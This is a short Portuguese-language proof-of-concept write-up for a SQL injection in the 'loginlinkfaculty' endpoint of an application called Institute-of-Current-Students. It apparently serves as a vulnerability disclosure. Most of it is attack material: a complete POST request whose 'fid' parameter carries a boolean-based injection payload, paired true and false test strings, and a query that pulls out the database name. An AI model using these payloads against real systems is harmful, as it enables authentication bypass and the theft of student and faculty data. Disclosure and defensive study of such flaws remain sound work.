
Exploit de prova de conceito para CVE-2025-52399, demonstrando injeção SQL no endpoint loginlinkfaculty do Institute-of-Current-Students, permitindo bypass de autenticação e extração de dados.
O endpoint loginlinkfaculty no aplicativo Institute-of-Current-Students é vulnerável a injeção SQL através do parâmetro POST fid. O parâmetro não é devidamente sanitizado antes de ser usado em uma consulta SQL, permitindo que atacantes remotos executem comandos SQL arbitrários.
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → VERDADEIRO
❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSO
SELECT database(); -- retorna 'icsnew'
Isroil Mustafoqulov